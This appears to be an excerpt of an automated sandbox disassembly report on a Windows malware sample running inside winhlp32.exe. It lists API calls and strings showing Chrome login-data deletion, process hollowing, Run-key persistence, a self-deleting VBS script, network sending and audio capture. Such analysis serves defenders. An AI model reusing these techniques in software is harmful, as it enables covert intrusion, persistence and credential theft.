                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP$['E
                                    • API String ID: 2299586839-2532616801
                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                    • GetLastError.KERNEL32 ref: 0040BA58
                                    Strings
                                    • UserProfile, xrefs: 0040BA1E
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                    • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • GetLastError.KERNEL32 ref: 0041799D
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409258
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                      • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                    • String ID:
                                    • API String ID: 2435342581-0
                                    • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                    • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                     Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                      • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                      • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                    • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                    • ExitProcess.KERNEL32 ref: 0040F8CA
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseExitOpenProcessQuerySleepValue
                                    • String ID: 4.9.4 Pro$override$pth_unenc
                                    • API String ID: 2281282204-930821335
                                    • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                    • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                    • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                    • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040966A
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                    • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00408811
                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                    • String ID:
                                    • API String ID: 1771804793-0
                                    • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                    • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                    • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                    • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: FileFind$FirstNextsend
                                    • String ID: XPG$XPG
                                    • API String ID: 4113138495-1962359302
                                    • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                    • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                    • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                    • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                      • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                      • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseCreateInfoParametersSystemValue
                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                    • API String ID: 4127273184-3576401099
                                    • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                    • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                     Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: PkGNG
                                    • API String ID: 0-263838557
                                    • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                    • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                    • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                    • GetLastError.KERNEL32 ref: 0041847A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                    • Opcode Fuzzy Hash: b936ea2c1396c7360966393650c98f262233681cd2418a1eb1ae5de04f4b839e
                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                     Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-332907002
                                    • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                    • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                     Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                    • ExitProcess.KERNEL32 ref: 0040D419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                    • API String ID: 3797177996-2557013105
                                    • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                    • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                    • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                    • SetEvent.KERNEL32 ref: 0041B219
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                    • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\winhlp32.exe,00000001,0040764D,C:\Windows\winhlp32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                    Strings
                                    Memory Dump Source
